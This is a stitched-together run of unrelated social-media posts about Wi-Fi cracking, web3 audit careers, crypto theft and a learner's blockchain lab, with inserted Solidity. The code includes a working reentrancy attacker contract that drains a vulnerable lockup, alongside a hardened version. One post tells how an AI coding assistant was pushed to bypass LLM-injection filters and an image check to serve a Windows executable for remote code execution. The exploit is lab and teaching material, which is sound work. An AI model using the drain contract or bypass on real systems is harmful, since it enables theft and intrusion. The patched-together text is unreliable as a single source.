HACKING #like THE FBI ??
In 2005 the Federal Bureau of Investigation (@FBI) cracked WEP (Wired Equivalent Privacy) passwords in minutes using freely available software. This was done publicly, in an effort to increase #Awareness of WEP's weaknesses (vulnerabilities).
I had the opportunity to emulate a similar demonstration at the ‘STAY AHEAD OF THE HACK’ event hosted by @cloud_mavinCC this #CybersecurityAwarenessMonth, but this time I managed to crack WPA2 (Wi-Fi Protected Access II) passwords in minutes… I also demonstrated a social engineering attack known as ‘EVIL TWIN’.
N.B.: WPA2 was an initial replacement for both WEP and WPA.
I'm currently on a tweeting break, but I've also been learning/building in silence and studying my Bible too!
Will let the planet know when it's completely shipped.
I made $600k USDC in ~20 months of doing solo smart contract security audits ('23-'24)
It all started when I was reading the Uniswap V2/V3 docs. I saw some whitehat (now OG in the space, @samczsun) had done a "solo" audit for them.
I was like "What? A solo audit? How good must he have been to be able to do audits all by himself?". I felt motivated and impressed, but I was still just starting out, so I moved on and forgot about it.
I started actively posting my journey on X - public learning for web3 security. I did some contests on code4rena/Sherlock and had a busy calendar to do every contest possible. One of my posts gathered attention, and I got a comment.
"Would you do a review for me? DM".
I did an "audit" for $600 USDC for 6 hours of work. Found 2 High and 2 Medium severity issues. Made a PDF report. The dev was very happy with the work. I published on socials - got a second comment/DM and did a second solo audit.
From then on I went on to do 50+ solo audits and make $600k, working all by myself, so having pretty much 100% profit. Bought a few nice things, upgraded my lifestyle a bit, but I also truly fell in love with ethical hacking and building sustainable businesses - creating long-term value for all parties involved.
That's how I started Pashov Audit Group, my current web3 security audits company, where we secured many many many billions of dollars for blockchain projects. Been a fun journey, but I am far from satisfied.
I will be using crypto my whole life, my wife and my kids will be using it, and their wives/husbands and kids. It's a long-term thing. That's why short term profit isn't something I get excited about. I'm a long-term thinker, and the only way to prove it is to keep going. Ending this year on a positive note - 2026 will be huge for all of us🔥
If you liked the story, Retweet and leave a comment about it, I'll make sure to respond to the good ones🫡
Tip of the day:
To temporarily hold back sneezing in public or hiding?
Press your tongue hard... against the back of your lower teeth.
It works like magic! 🪄
I just want to say this.
Every Nigerian federal University website (running on WP) should check their system.
I just did some tests and sincerely, all it takes is a little effort from any bored tester.
North Korea has stolen over $3 billion from crypto.
Not by breaking cryptography.
Not by finding exotic zero-days in Solidity.
By sending fake job offers on LinkedIn to developers with privileged access.
One developer. One malicious PDF. Months of patience.
$625M gone from Ronin.
$1.5B gone from Bybit.
Your smart contract is audited.
Your team's inbox is not.
When did you last brief your team on this specific attack vector?
Three audits. No bug bounty. AI-powered security scanner.
vs.
One audit. $500K active bounty. No AI tools.
The second protocol is safer. Not even close.
AI scanners find what they were trained on. Bug bounties incentivize people to find what nobody has thought of yet.
You cannot train a model on the vulnerability that hasn't been discovered yet. You can pay a researcher to find it.
5k lines of @LayerZero_Core, zero findings
turns out "intended behavior" is doing a lot of heavy lifting in that codebase 😭
how can there be a bug if everything is a design choice 🙂🔒
I finally seem to have a working AI bug hunter setup.
All findings using Claude Code with Opus 4.7.
Got a few duplicates but seems like the workflow is working in the right direction now.
Two interesting findings I had on one program:
- LLM Injection - My first LLM injection. Initially Claude Code flagged it and discarded it, saying it's LLM injection, as if it were an invalid bug 😄. I had to ask it to focus on LLM injections and it was easily able to bypass it. It seems there were no filters for LLM injection. But the workflow didn't have any MCP or tools, so the impact was not much.
- RCE on a Windows machine - It found an image proxy where the user can control file names. It suggested this was a low finding and that the only thing we could do was defame the company by uploading malicious images with malicious names. Then I asked: if we can control images, we should be able to bypass the check to upload executables. It was able to find a full workflow to bypass the image check and upload a Windows executable, which would be served from the target-owned image proxy and run on Windows machines to achieve RCE.
All I can say is "It's been God".
There were days I felt like "not showing up". Days I wanted to give up, but here we are. Still at it. Pushing. Praying 🤲🏾. Dreaming 🧎🏻‍♂️ and working BTS.
Each day brings me closer to my goal 🎯.
Still $0 made, but it will pay off someday.
#BLOCKCHAIN JOURNEY 👣 Week 7.
After a week of no #Web3. No Chess. No Workout.
I'm back at it again. This time even more Robust (Strong & Healthy).
Focus: Cryptography
P.S.: To excel in this field you must have a good knowledge of mathematics.
UPDATE ON MY #Blockchain JOURNEY, weeks 5 & 6:
I realize I did say I was going on a little break... However, that was a break from posting (tweeting) on here. I never really took a break from learning #Web3; that alone is enough to probably drive me into boredom.
The last few weeks were spent on rigorous learning of Solidity and practising (observation and application of the art of "learning by doing").
During this period, I've been able to build from scratch a #Web3 Practice Lab with everything I need, including a few smart contracts for testing reentrancy and access control vulnerabilities (Coming to GitHub 🔜). I achieved this with the help of the Foundry framework, which made life a lot easier for me.
I built the following smart contracts:
1. A lockup contract (vulnerable mindset) with an unlock time, where the contract's balance can only be withdrawn by the beneficiary when block.timestamp > unlockTime. This vulnerable contract was deliberately programmed to trust user input blindly.
Apparently the idea was inspired by a real world audit target, as I was bug hunting during this same timeframe.
My focus was on finding ways to exploit the "withdraw" function (no reentrancy lock 🔒).
I found ways to inject a malicious token, then trigger a callback afterwards (this didn't end well).
I also tried exploiting the access controls, e.g.:
require(msg.sender == beneficiary)
require(block.timestamp > unlockTime)
I believe the above two restrictions were implemented to ensure that until one year after system deployment, tokens originating from the deployer cannot enter circulating supply and cannot be staked to earn system revenue.
Moreover, they also ensure that only an eligible beneficiary can withdraw from the smart contract.
Furthermore, I went on to add a vulnerable prototype of this Lockup contract to my Lab, to practise, test and provide proofs of concept.
2. Built an Evil token contract, which I used in funding the Lockup contract.
3. Built an Attacker's contract that executes the overall attack.
For demo purposes I did the following:
1. Set EvilToken as token
2. Set EvilToken as beneficiary
3. Set unlockTime in past or fast forward time.
Lastly, I wrote a bash script (Coming to GitHub 🔜) that does all of the setup for me, without me needing to execute each command individually. This saved me a lot of time.
The whole experience was fun and exciting, plus I enjoyed watching the flow of funds being drained from the Vulnerable contract's account to the Attacker's, and transactions being broadcast on the anvil local testnet (#Blockchain).
Oh, why wouldn't you love #Web3?
Join me on this journey and together we'd explore the powers of a "programmable decentralized Blockchain, controlling money 💰".
Final takeaways:
Reentrancy is NOT just about callbacks;
It’s about:
1. Who starts the call.
2. Who reenters.
3. Who passes access control.
While my submission to my target 🎯 (which also happens to be my first) turned out to be "invalid", I did learn a lot from my target, because unlike the vulnerable contract, my audit target actually validates everything by preventing the following:
Our exploit lab setup ❌
Time bypass ❌
Arbitrary token injection;
The contract is tightly coupled to a specific token system. Not just ANY ERC20.
I believe I am very close to my first valid finding on #Web3, I really can't wait for that moment.
I've always had a strong belief that someday; the time spent on debugging, researching, fuzzing and reading #code, won't go to waste—eventually. 🥱
#Godspeed!
https://t.co/wUbLnPjSBj
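The lab described above (vulnerable lockup, attacker contract that is itself the beneficiary, no reentrancy lock, unlockTime trusted from the caller), as an added example. This is not the author's lab code, which is not on the page; contract and function names (VulnerableLockup, Attacker, SafeLockup, deposit, withdraw) are assumptions, and it escrows plain ETH instead of the post's EvilToken so the drain is visible without a second token contract. The hardened contract at the end is the fix a practitioner would apply.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added lab example, not the post author's code. Deliberately vulnerable lockup:
// it trusts the caller-supplied beneficiary and unlockTime, and pays out
// before zeroing the balance, with no reentrancy lock.
contract VulnerableLockup {
    mapping(address => uint256) public locked;
    mapping(address => uint256) public unlockTime;

    // Anyone can lock ETH for any beneficiary with any unlockTime (even one in the past).
    function deposit(address beneficiary, uint256 _unlockTime) external payable {
        locked[beneficiary] += msg.value;
        unlockTime[beneficiary] = _unlockTime;
    }

    function withdraw() external {
        address beneficiary = msg.sender;                   // access control: only the beneficiary
        uint256 amount = locked[beneficiary];
        require(amount > 0, "nothing locked");
        require(block.timestamp > unlockTime[beneficiary], "still locked");
        (bool ok, ) = beneficiary.call{value: amount}("");  // interaction before effect...
        require(ok, "transfer failed");
        locked[beneficiary] = 0;                            // ...so a reentrant call still sees the old balance
    }
}

// The attacker contract *is* the beneficiary, so it passes the access control,
// and it reenters withdraw() from receive() until the lockup cannot pay again.
contract Attacker {
    VulnerableLockup public immutable target;
    address public immutable owner;

    constructor(VulnerableLockup _target) {
        target = _target;
        owner = msg.sender;
    }

    // 1. lock a small stake for ourselves with an unlockTime already in the past
    // 2. start the withdraw; receive() does the rest
    // 3. forward the loot to the EOA that deployed us
    function attack() external payable {
        require(msg.sender == owner, "not owner");
        target.deposit{value: msg.value}(address(this), 0);
        target.withdraw();
        (bool ok, ) = owner.call{value: address(this).balance}("");
        require(ok, "payout failed");
    }

    receive() external payable {
        // locked[attacker] has not been zeroed yet: reenter while the victim can still pay it
        if (address(target).balance >= target.locked(address(this))) {
            target.withdraw();
        }
    }
}

// Hardened form: validated input, checks-effects-interactions, and a reentrancy lock.
contract SafeLockup {
    mapping(address => uint256) public locked;
    mapping(address => uint256) public unlockTime;
    bool private entered;

    modifier nonReentrant() {
        require(!entered, "reentrant");
        entered = true;
        _;
        entered = false;
    }

    function deposit(address beneficiary, uint256 _unlockTime) external payable {
        require(_unlockTime > block.timestamp, "unlockTime must be in the future");
        // a later depositor must not be able to shorten an existing lock
        require(unlockTime[beneficiary] == 0 || unlockTime[beneficiary] == _unlockTime, "unlockTime fixed");
        locked[beneficiary] += msg.value;
        unlockTime[beneficiary] = _unlockTime;
    }

    function withdraw() external nonReentrant {
        uint256 amount = locked[msg.sender];
        require(amount > 0, "nothing locked");
        require(block.timestamp > unlockTime[msg.sender], "still locked");
        locked[msg.sender] = 0;                             // effect first
        (bool ok, ) = msg.sender.call{value: amount}("");   // interaction last
        require(ok, "transfer failed");
    }
}
```

In a Foundry test, deploy VulnerableLockup, deposit a few ether for a victim address with a future unlockTime, deploy Attacker from a separate account, call attack{value: 1 ether}(), and assert that the lockup's balance is zero and the attacker's owner holds the victim's ether; the same deposit-with-past-unlockTime step reverts against SafeLockup, and even with a valid unlockTime the nonReentrant modifier and the zeroed balance leave receive() nothing to drain.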
Day 6:
Studied the various elliptic curve libraries and implementations of secp256k1.
Learnt cryptographic hash functions and Hex Encoding with Checksum in Capitalization (ERC-55)... how it solves the mixed capitalization problem.
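How the ERC-55 checksum actually works, as an added example in Solidity (not code from the post): the 40 lowercase hex digits of the address are keccak256-hashed as an ASCII string, and the i-th letter is upper-cased exactly when the i-th hex digit of that hash is 8 or above. A single wrong character in a typed address almost always breaks the case pattern, which is how the mixed capitalization becomes a checksum. The library and function names (Erc55, toChecksumString, matchesChecksum) are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example (not from the original post): ERC-55 mixed-case checksum.
// Rule: lowercase the 40 hex digits, keccak256 that ASCII string, and
// upper-case the i-th letter iff the i-th hex digit of the hash is >= 8.
library Erc55 {
    function hexChar(uint8 nibble) private pure returns (bytes1) {
        return nibble < 10 ? bytes1(nibble + 48) : bytes1(nibble + 87); // '0'-'9', 'a'-'f'
    }

    // Lowercase 40-character hex string of `a`, without the 0x prefix.
    function lowerHex(address a) internal pure returns (bytes memory out) {
        out = new bytes(40);
        uint160 v = uint160(a);
        for (uint256 i = 0; i < 40; i++) {
            out[i] = hexChar(uint8(v >> (4 * (39 - i))) & 0x0f);
        }
    }

    // ERC-55 checksummed "0x..." string for `a`.
    function toChecksumString(address a) internal pure returns (string memory) {
        bytes memory lower = lowerHex(a);
        bytes32 h = keccak256(lower);   // hash of the ASCII digits, not of the 20 raw address bytes
        bytes memory out = new bytes(42);
        out[0] = "0";
        out[1] = "x";
        for (uint256 i = 0; i < 40; i++) {
            uint8 c = uint8(lower[i]);
            // i-th hex digit of the hash: high nibble for even i, low nibble for odd i
            uint8 hashNibble = i % 2 == 0 ? uint8(h[i / 2]) >> 4 : uint8(h[i / 2]) & 0x0f;
            if (c >= 97 && hashNibble >= 8) c -= 32;   // 'a'..'f' -> 'A'..'F'; digits are left alone
            out[i + 2] = bytes1(c);
        }
        return string(out);
    }

    // True iff `s` is exactly the checksummed spelling of `a`; a mis-cased or
    // mistyped input fails, which is the whole point of the scheme.
    function matchesChecksum(string memory s, address a) internal pure returns (bool) {
        return keccak256(bytes(s)) == keccak256(bytes(toChecksumString(a)));
    }
}
```

The test vectors listed in EIP-55 are the quickest way to check an implementation like this: feed each listed address into toChecksumString and compare the output byte for byte, and also confirm that the all-lowercase and all-uppercase spellings fail matchesChecksum.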